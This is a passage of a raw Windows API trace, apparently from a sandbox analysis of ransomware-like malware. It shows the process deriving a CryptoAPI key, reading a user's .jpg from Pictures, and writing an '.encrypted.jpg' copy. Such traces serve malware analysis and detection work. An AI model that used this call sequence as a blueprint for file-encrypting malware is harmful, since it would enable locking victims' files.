lpString1="0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.102] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.102] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.102] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.102] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.102] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.102] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.102] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.102] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.102] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb975d470, ftCreationTime.dwHighDateTime=0x1d5b5db, ftLastAccessTime.dwLowDateTime=0x5d448bc0, ftLastAccessTime.dwHighDateTime=0x1d5c2ff, ftLastWriteTime.dwLowDateTime=0x5d448bc0, ftLastWriteTime.dwHighDateTime=0x1d5c2ff, nFileSizeHigh=0x0, nFileSizeLow=0x3a26, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="jn9U.jpg", cAlternateFileName="")) returned 0x7c2100 [0041.102] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.103] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.103] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.103] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.103] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.103] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.103] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0041.104] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.104] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.104] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.104] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.104] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.104] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.104] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.104] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.104] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.104] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.104] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.104] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.104] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.105] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.105] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0041.105] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.105] CryptDestroyHash (hHash=0x7c2240) returned 1 [0041.105] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\jn9u.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.105] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.105] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0041.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.105] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0041.107] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0")) returned 0x10 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.encrypted.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\jn9u.encrypted.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0041.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0041.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0041.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0041.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0041.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0041.109] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.109] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x3a26, lpOverlapped=0x0) returned 1 [0041.111] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a26) returned 0xac2018 [0041.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0041.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a26) returned 0xac5a48 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.112] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a26) returned 0xac2018 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.112] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.112] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.113] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a26) returned 0xac2018 [0041.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.113] RtlAllocateHeap (HeapHandle=0x770000, 